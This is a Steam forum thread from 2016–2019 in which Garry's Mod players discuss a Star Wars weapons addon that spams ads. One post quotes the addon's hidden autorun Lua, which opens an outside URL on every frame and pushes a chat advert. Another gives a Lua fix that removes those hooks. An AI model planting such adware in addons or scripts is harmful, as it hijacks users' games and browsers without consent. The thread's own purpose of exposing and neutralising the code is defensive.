Garry's Mod

Garry's Mod

View Stats:
TimeMaster131 Jan 14, 2016 @ 11:28am
Pop Up ads........on Gmod.......
Anybody else getting those annoying web hosting ads that make the game umplayable?
< >
Showing 1-14 of 14 comments
Mooty Jan 14, 2016 @ 11:37am 
thx :P i thought i had a virus XD
Zak Jan 14, 2016 @ 11:38am 
Nah, it's harmless. I think the aurthor did it to try and stop people from using his sweps on anything other than his server.
Originally posted by Matt:
thx :P i thought i had a virus XD
ecks dee
Zak Jan 14, 2016 @ 11:44am 
rolf, looked at the addon and it has "Star Wars Battlefront 2015 SWEPs\lua\autorun\client\cl_ad.lua" inside:
hook.Add("Think", "sfdgsadf", function() net.Receive("chatadd", function(len, pl) pl = LocalPlayer() local var = net.ReadString() white = Color( 240, 240, 240 ) red = Color( 240, 50, 50 ) gold = Color(240,240,60) if !(pl:IsAdmin() == true) then if var == "ad" then chat.AddText( red,"► " ,white, "The Battlefront™ beta weapons has been provided by ",gold, "www.HammerfallNetworks.com", white,".") end end end) gui.OpenURL("http://fading-door-tool.comlu.com") end)
Last edited by Zak; Jan 14, 2016 @ 11:45am
Cobra Commander Jan 14, 2016 @ 11:47am 
Originally posted by Hackcraft:
Nah, it's harmless. I think the aurthor did it to try and stop people from using his sweps on anything other than his server.
Well thats rather ironic.
Zak Jan 14, 2016 @ 11:52am 
Don't worry, I am working on an ad block for it xD It'll be out soon.
Psyop Consumer Jan 14, 2016 @ 12:01pm 
Confirming. Also had ads, also had Star Wars weapons pack.
hazardous gaming Jan 14, 2016 @ 12:06pm 
thank god i am literaly searching everywere cause i thought i had a virus too. ill unistall itnow. I liked that mod though :steamsad:
razgraz Jan 14, 2016 @ 12:23pm 
Originally posted by Hackcraft:
Un-sub from this
http://steamcommunity.com/sharedfiles/filedetails/?id=586299394&searchtext=star+wars+battlefront

You're ♥♥♥♥♥♥♥ kidding me right? This douchenozzle actually put a autorun lua that opens ads?

Some people are just scumbags jesus christ. Report it for adware and let it get removed from workshop.
Last edited by razgraz; Jan 14, 2016 @ 12:26pm
Radray Jan 14, 2016 @ 12:43pm 
I really hate it when people do stuff like this. OpenURL in a think hook? that has to be a mistake, but here, create a file like this: garrysmod/addons/swfix/lua/autorun/swfix.lua
And put this inside the file:

if SERVER then

hook.Add("InitPostEntity", "swfix", function() -- Just so it loads after workshop addons
hook.Remove("PlayerSpawn", "z") -- Lets not spam people with ads
hook.Remove("PlayerShouldTakeDamage", "DisasdfgayerSpra3434y") -- Why should a weapon addon disable trigger_hurt?....
end)

else

hook.Add("InitPostEntity", "swfix", function() -- Just so it loads after workshop addons
hook.Remove("Think", "sfdgsadf") -- OpenURL on a Think hook? lol
end)

end
Cubature Jan 24, 2019 @ 4:13pm 
Originally posted by 𝙧𝙖𝙯𝙜𝙧𝙖𝙯:
Originally posted by Hackcraft:
Un-sub from this
http://steamcommunity.com/sharedfiles/filedetails/?id=586299394&searchtext=star+wars+battlefront

You're ♥♥♥♥♥♥♥ kidding me right? This douchenozzle actually put a autorun lua that opens ads?

Some people are just scumbags jesus christ. Report it for adware and let it get removed from workshop.
it got removed. now i am stuck with ads :P
Cubature Jan 24, 2019 @ 4:22pm 
Originally posted by Hackcraft:
Don't worry, I am working on an ad block for it xD It'll be out soon.
i need a link if it still exists
if you people still fall for such addons, i made an solution;
https://steamcommunity.com/sharedfiles/filedetails/?id=1925186507
< >
Showing 1-14 of 14 comments
Per page: 1530 50

Date Posted: Jan 14, 2016 @ 11:28am
Posts: 14